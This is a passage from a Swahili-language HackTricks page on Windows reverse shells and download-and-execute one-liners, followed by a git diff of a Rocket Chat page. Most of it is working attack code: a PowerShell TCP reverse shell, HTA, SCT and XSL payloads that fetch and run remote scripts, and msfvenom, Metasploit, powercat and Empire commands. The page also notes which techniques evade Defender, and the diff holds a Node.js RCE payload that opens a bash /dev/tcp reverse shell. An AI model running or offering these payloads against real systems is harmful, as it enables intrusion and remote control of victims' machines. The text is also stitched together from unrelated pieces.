$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**Pata maelezo zaidi kuhusu Shells tofauti za Powershell mwishoni mwa hati hii**
## Mshta
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
```bash
mshta http://webserver/payload.hta
```
```bash
mshta \\webdavserver\folder\payload.hta
```
#### **Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)**
```xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
```
**Unaweza kupakua na kutekeleza kwa urahisi sana zombie ya Koadic ukitumia stager hta**
#### mfano wa hta
[**Kutoka hapa**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```xml
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
```
#### **mshta - sct**
[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
```
#### **Mshta - Metasploit**
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
```
```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
```
**Imegunduliwa na mlinzi**
## **Rundll32**
[**Mfano wa Dll hello world**](https://github.com/carterjones/hello-world-dll)
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
**Imegunduliwa na mlinzi**
**Rundll32 - sct**
[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
```
#### **Rundll32 - Metasploit**
```bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
```
**Rundll32 - Koadic**
```bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
```
## Regsvr32
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
**Imepatikana na mlinzi**
#### Regsvr32 -sct
[**Kutoka hapa**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
```
#### **Regsvr32 - Metasploit**
```bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr**
## Certutil
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
Pakua B64dll, ikode na uitekeleze.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Pakua B64exe, ikode na uiendeshe.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
**Imepatikana na mlinzi**
## **Cscript/Wscript**
```bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
```
**Cscript - Metasploit**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
```
**Imepatikana na mlinzi**
## PS-Bat
```bash
\\webdavserver\folder\batchfile.bat
```
Mchakato unaofanya wito wa mtandao: **svchost.exe**\
Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
```
```bash
\\10.8.0.3\kali\shell.bat
```
**Imepatikana na mlinzi**
## **MSIExec**
Mshambuliaji
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
```
Mtu aliyeathirika:
```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
**Imepatikana**
## **Wmic**
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
wmic os get /format:"https://webserver/payload.xsl"
```
Mfano wa faili ya xsl [kutoka hapa](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```xml
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>
```
**Haikutambuliwa**
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager wmic**
## Msbuild
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
Unaweza kutumia mbinu hii kupita Application Whitelisting na vizuizi vya Powershell.exe. Kama utavyoonyeshwa na PS shell.\
Pakua hii na uifanye: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
**Haikutambuliwa**
## **CSC**
Kusanya msimbo wa C# kwenye mashine ya mwathirika.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Haijatambuliwa**
## **Regasm/Regsvc**
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
**Sijajaribu**
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
## Odbcconf
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
**Sijajaribu**
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
## Powershell Shells
### PS-Nishang
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
Katika folda ya **Shells**, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, fanya nakala ya script na ongeza mwishoni mwa faili:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
Anza kuhudumia skripti kwenye seva ya wavuti na uitekeleze upande wa mwathirika:
```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
**TODO: Angalia nishang shells nyingine**
### **PS-Powercat**
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite kwenye upande wa mwathirika:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
**Chaguzi nyingine zinazotolewa na powercat:**
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
```
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep
```
### Empire
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleze.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
**Imegundulika kama msimbo mbaya**
### MSF-Unicorn
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
Unda toleo la powershell la backdoor ya metasploit ukitumia unicorn
```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
Anza msfconsole na rasilimali iliyoundwa:
```
msfconsole -r unicorn.rc
```
Anza seva ya wavuti inayotoa faili _powershell\_attack.txt_ na uendeleze katika mwathiriwa:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
**Imepatikana kama msimbo mbaya**
## Zaidi
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX)
## Marejeleo
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
**Jaribu Kikundi cha Usalama wa Juu**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

16
network-services-pentesting/pentesting-web/rocket-chat.md
View file

@ -1,8 +1,8 @@
# Rocket Chat
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -14,7 +14,6 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -29,7 +28,7 @@ Ikiwa wewe ni admin ndani ya Rocket Chat unaweza kupata RCE.
<figure><img src="../../.gitbook/assets/image (266).png" alt=""><figcaption></figcaption></figure>
* Kulingana na [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), zote zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kuchakata data. Hivyo hebu tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kama:
* Kulingana na [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), zote zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es-2017-ecmascript-dca859e4821c)) kusindika data. Hivyo hebu tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) kama:
```javascript
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
@ -53,9 +52,10 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -63,9 +63,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" al
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
</details>
{% endhint %}